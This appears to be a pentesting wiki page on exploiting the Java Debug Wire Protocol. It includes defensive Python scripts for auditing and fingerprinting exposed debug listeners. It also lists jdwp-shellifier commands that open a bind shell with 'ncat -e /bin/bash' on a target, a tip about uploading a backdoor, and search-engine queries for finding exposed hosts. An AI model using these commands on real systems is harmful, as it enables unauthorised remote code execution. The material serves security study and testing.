---
title: "5005 - Jdwp"
weight: 5005
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This document introduces penetration-testing methods for **JDWP (Java Debug Wire Protocol)** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Unauthorized testing of systems may violate laws and regulations.

---

## Pentesting JDWP - Java Debug Wire Protocol

### Exploiting

JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network.

In terms of process identification, searching the command lines of running Java processes for the string "jdwp" (as in the `-Xrunjdwp` or `-agentlib:jdwp` JVM options) can indicate an active JDWP agent.
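The process check described above, turned into a small host-inventory script, as an added example that is not part of the original page or of jdwp-shellifier. It parses the `-Xrunjdwp:` / `-agentlib:jdwp=` option string of each Java command line and flags listeners that are reachable from the network (wildcard or non-loopback `address=`), so the weak setting and its loopback-bound correction can be compared side by side. The command lines in `SAMPLE_CMDLINES` are constructed for the example; the `ps` invocation in `main` is only used when the script is run directly on a host.

```python
import re
import subprocess
from dataclasses import dataclass

# Constructed sample command lines (no real hosts). The last two show the
# weak setting (wildcard bind) and the corrected one (loopback bind).
SAMPLE_CMDLINES = [
    "java -jar app.jar",
    "java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar legacy.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar api.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005 -jar api.jar",
]

# Both spellings of the debug-agent option carry the same key=value list.
JDWP_OPT = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")

LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}
WILDCARD = {"*", "0.0.0.0", "::", "[::]"}


@dataclass
class JdwpConfig:
    raw: str        # the matched option as it appeared on the command line
    options: dict   # parsed key=value pairs (transport, server, suspend, address, ...)
    exposed: bool   # True if the listener is reachable from off-host
    reason: str


def classify(opts):
    """Decide whether a parsed JDWP option set opens a network-reachable listener."""
    if opts.get("transport") != "dt_socket":
        return False, "not a socket transport"
    if opts.get("server", "n") != "y":
        return False, "JVM connects out to a debugger; no listener"
    addr = opts.get("address", "")
    host, sep, port = addr.rpartition(":")
    if not sep:
        # A bare port binds all interfaces on JDK 8 and earlier; JDK 9+ defaults to loopback.
        return True, f"bare port {port}: binds all interfaces on pre-JDK-9 JVMs"
    if host in WILDCARD:
        return True, f"wildcard bind {host}"
    if host in LOOPBACK:
        return False, f"loopback bind {host}"
    return True, f"bound to non-loopback address {host}"


def parse_jdwp_options(cmdline):
    """Return a JdwpConfig if the command line enables the JDWP agent, else None."""
    m = JDWP_OPT.search(cmdline)
    if not m:
        return None
    opts = {}
    for kv in m.group(1).split(","):
        key, _, value = kv.partition("=")
        opts[key] = value
    exposed, reason = classify(opts)
    return JdwpConfig(raw=m.group(0), options=opts, exposed=exposed, reason=reason)


def audit(cmdlines):
    """Return (cmdline, config) pairs for every process with a network-exposed JDWP listener."""
    findings = []
    for line in cmdlines:
        cfg = parse_jdwp_options(line)
        if cfg is not None and cfg.exposed:
            findings.append((line, cfg))
    return findings


def main():
    # On a live host, feed the real process list instead of the constructed sample.
    try:
        out = subprocess.run(["ps", "-eo", "args"], capture_output=True, text=True, check=True).stdout
        cmdlines = out.splitlines()[1:]
    except (OSError, subprocess.CalledProcessError):
        cmdlines = SAMPLE_CMDLINES
    for line, cfg in audit(cmdlines):
        print(f"EXPOSED ({cfg.reason}): {cfg.raw}\n    {line}")


if __name__ == "__main__":
    main()
```

The fix the script points at is the same in every case: either drop the agent from production JVMs, or bind it to loopback (`address=127.0.0.1:5005`) and reach it through an authenticated tunnel. Note the JDK-version caveat on a bare `address=8000`: older JVMs listen on every interface with that setting, which is why it is reported as exposed.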

The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters:

```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```

I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.

### More details

**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.

1. **JDWP Overview**:

   - It's a packet-based network binary protocol, primarily synchronous.
   - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.

2. **JDWP Handshake**:

   - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).

3. **JDWP Communication**:

   - Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.
   - CommandSet values range from 0x40 to 0x80, representing different actions and events.

4. **Exploitation**:

   - JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
   - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.

5. **Real-Life Exploitation**:

   - Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
   - The exploit script was tested against various JDK versions and is platform-independent, offering reliable remote code execution (RCE).

6. **Security Implications**:

   - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
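The handshake from the "Exploiting" section and the packet layout from point 3 above (Length, Id, Flags, CommandSet/Command, or error code on replies), as an added example that is not part of the original page, the IOActive article, or jdwp-shellifier. It encodes and decodes the 11-byte JDWP header, then uses that to fingerprint a listener the way a defender's scanner would: send `JDWP-Handshake`, expect it echoed back, and issue the read-only `VirtualMachine.Version` request (command set 1, command 1 in the JDWP specification) to record which VM is listening. `SAMPLE_VERSION_REPLY` is a constructed reply so the decoder can be exercised without a network; `probe()` is the only function that touches a socket.

```python
import socket
import struct

HANDSHAKE = b"JDWP-Handshake"   # 14 ASCII bytes, sent by both sides to open a session
HEADER_LEN = 11                 # Length(4) Id(4) Flags(1) CommandSet(1) Command(1)
REPLY_FLAG = 0x80               # Flags bit that marks a reply; bytes 9-10 then hold an error code
VM_SET, VM_VERSION = 1, 1       # VirtualMachine command set, Version command (JDWP spec)


def build_command(pkt_id, command_set, command, data=b""):
    """Serialize a JDWP command packet (all integers big-endian)."""
    return struct.pack(">IIBBB", HEADER_LEN + len(data), pkt_id, 0, command_set, command) + data


def build_reply(pkt_id, error_code, data=b""):
    """Serialize a JDWP reply packet; used here only to construct sample input."""
    return struct.pack(">IIBH", HEADER_LEN + len(data), pkt_id, REPLY_FLAG, error_code) + data


def parse_packet(buf):
    """Parse one JDWP packet from the front of buf; return (packet dict, remaining bytes)."""
    if len(buf) < HEADER_LEN:
        raise ValueError("short header")
    length, pkt_id, flags = struct.unpack(">IIB", buf[:9])
    if length < HEADER_LEN or len(buf) < length:
        raise ValueError("truncated packet")
    body = buf[HEADER_LEN:length]
    if flags & REPLY_FLAG:
        (error_code,) = struct.unpack(">H", buf[9:11])
        pkt = {"id": pkt_id, "reply": True, "error": error_code, "data": body}
    else:
        pkt = {"id": pkt_id, "reply": False, "command_set": buf[9], "command": buf[10], "data": body}
    return pkt, buf[length:]


def jdwp_string(text):
    """JDWP string encoding: 4-byte big-endian length followed by UTF-8 bytes."""
    raw = text.encode("utf-8")
    return struct.pack(">I", len(raw)) + raw


def parse_version_reply(data):
    """Decode a VirtualMachine.Version reply body: description, jdwpMajor, jdwpMinor, vmVersion, vmName."""
    off = 0

    def read_string():
        nonlocal off
        (n,) = struct.unpack_from(">I", data, off)
        off += 4
        text = data[off:off + n].decode("utf-8")
        off += n
        return text

    fields = {"description": read_string()}
    fields["jdwp_major"], fields["jdwp_minor"] = struct.unpack_from(">ii", data, off)
    off += 8
    fields["vm_version"] = read_string()
    fields["vm_name"] = read_string()
    return fields


# Constructed sample reply (not captured from a real JVM) for offline testing of the decoder.
SAMPLE_VERSION_REPLY = build_reply(
    1, 0,
    jdwp_string("Java Debug Wire Protocol (constructed sample) version 1.8")
    + struct.pack(">ii", 1, 8)
    + jdwp_string("1.8.0_sample")
    + jdwp_string("Constructed HotSpot VM"),
)


def recv_exact(sock, n):
    """Read exactly n bytes or raise if the peer closes first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during read")
        buf += chunk
    return buf


def probe(host, port, timeout=3.0):
    """Fingerprint a JDWP listener; returns the decoded Version reply, or None if it is not JDWP."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        if recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
            return None
        s.sendall(build_command(1, VM_SET, VM_VERSION))
        hdr = recv_exact(s, HEADER_LEN)
        (length,) = struct.unpack(">I", hdr[:4])
        pkt, _ = parse_packet(hdr + recv_exact(s, length - HEADER_LEN))
        if not pkt["reply"] or pkt["error"] != 0:
            return None
        return parse_version_reply(pkt["data"])


if __name__ == "__main__":
    pkt, _ = parse_packet(SAMPLE_VERSION_REPLY)
    print(parse_version_reply(pkt["data"]))
```

Run `probe("127.0.0.1", 5005)` against a host you administer to confirm whether a debug agent is really reachable on the port the inventory reported; a service that does not echo the handshake is not JDWP, and the Version reply records exactly which JVM is exposed, which is the evidence a security review needs before disabling the agent or firewalling the port.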

#### **References:**

- [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
- [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
- [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
- http://www.secdev.org/projects/scapy (no longer active)
- [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
- http://www.hsc-news.com/archives/2013/000109.html (no longer active)
- [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
- [https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults](https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults)
- [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
- [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html)
- [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
- [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)

---


### Search engine syntax

#### FOFA

```bash
# FOFA search syntax
port="5005"
```

#### Shodan

```bash
# Shodan search syntax
port:5005
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:5005
```

---

## 📖 References

- [HackTricks - 5005-jdwp](https://book.hacktricks.wiki/en/network-services-pentesting/5005-jdwp.html)

